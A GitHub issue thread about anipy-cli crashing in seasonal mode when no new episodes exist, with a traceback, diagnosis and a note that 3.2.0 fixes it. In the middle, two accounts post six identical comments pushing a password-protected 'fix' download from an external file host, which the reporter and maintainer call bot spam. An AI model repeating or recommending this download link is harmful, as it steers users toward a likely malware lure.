### ISSUE TITLE
CLI crashing when trying to download seasonals

### ISSUE THREAD

**Issue by Prashanthvsdvn** [sdaqo/anipy-cli#193]
**Describe the bug**
Inside Seasonals menu, the CLI keeps crashing when trying to either watch or download newest episodes. Although, I suspect this happens only when there is no new episodes for it to fetch (but I'm not sure). I'm have attached the error log.

**To Reproduce**
1. Open anipy-cli in seasonal mode
2. Try to download/watch newest episode
3. Program Crashes

**Expected behavior**
The program would fetch new episodes and show options on what to download/watch. If nothing is found, it would say so.

**Info**
```
Name: anipy-cli
Version: 3.1.11
Summary: Watch and Download anime from the comfort of your Terminal
Home-page: https://sdaqo.github.io/anipy-cli
Author: sdaqo
Author-email: sdaqo.dev@protonmail.com
License: GPL-3.0
Location: C:\Python312\Lib\site-packages
Requires: anipy-api, appdirs, inquirerpy, pypresence, pyyaml, yaspin
Required-by:
```

**Platform**
 - OS: Windows 11

**Additional context**
Error log
```
Traceback (most recent call last):
  File "<frozen runpy>", line 198, in _run_module_as_main
  File "<frozen runpy>", line 88, in _run_code
  File "C:\Python312\Scripts\anipy-cli.exe\__main__.py", line 7, in <module>
  File "C:\Python312\Lib\site-packages\anipy_cli\cli.py", line 60, in run_cli
    cli_class(options=args).run()
  File "C:\Python312\Lib\site-packages\anipy_cli\clis\base_cli.py", line 31, in run
    ret = func()
          ^^^^^^
  File "C:\Python312\Lib\site-packages\anipy_cli\clis\seasonal_cli.py", line 31, in post
    menu.run()
  File "C:\Python312\Lib\site-packages\anipy_cli\menus\base_menu.py", line 30, in run
    self.take_input()
  File "C:\Python312\Lib\site-packages\anipy_cli\menus\base_menu.py", line 41, in take_input
    op.callback()
  File "C:\Python312\Lib\site-packages\anipy_cli\menus\seasonal_menu.py", line 187, in download_latest
    picked = self._choose_latest()
             ^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python312\Lib\site-packages\anipy_cli\menus\seasonal_menu.py", line 78, in _choose_latest
    choices = inquirer.fuzzy(  # type: ignore
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python312\Lib\site-packages\InquirerPy\prompts\fuzzy.py", line 413, in __init__
    self._content_control: InquirerPyFuzzyControl = InquirerPyFuzzyControl(
                                                    ^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Python312\Lib\site-packages\InquirerPy\prompts\fuzzy.py", line 88, in __init__
    super().__init__(
  File "C:\Python312\Lib\site-packages\InquirerPy\base\control.py", line 73, in __init__
    self._safety_check()
  File "C:\Python312\Lib\site-packages\InquirerPy\base\control.py", line 156, in _safety_check
    raise InvalidArgument("argument choices cannot be empty")
InquirerPy.exceptions.InvalidArgument: argument choices cannot be empty
```

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Prashanthvsdvn** [comment]
@sdaqo am I getting botted on this issue. 6 identical comments from 2 accounts in matter of minutes, all asking me to install something from an external website. and none of them seem to be related to the repo

**Comment by sdaqo** [comment]
Yup that looks like a bot, about your issue. I am currently on vacation (without a laptop) and cannot fix your issue until I am back, sorry, but maybe someone else will pick it up.

**Comment by DragonOfShuu** [comment]
I will look into this! I'll run tests on MacOS and Windows and see what I can find, and I'll post a pull request when I find the solution

**Comment by DragonOfShuu** [comment]
Okay, I have discovered the problem you have encountered. This error happens when you are already all caught up on all episodes (from my testing). There are a few other potential errors that may occur, so I'm going to try to make fail safes for those too. Once I am done, I'll make a PR referencing this issue! Thanks for bringing this issue up :)

**Comment by Prashanthvsdvn** [comment]
Yup. that was my suspicion too, when I checked for new episodes when I caught up with them. ty for the response

**Comment by sdaqo** [comment]
fixed in 3.2.0
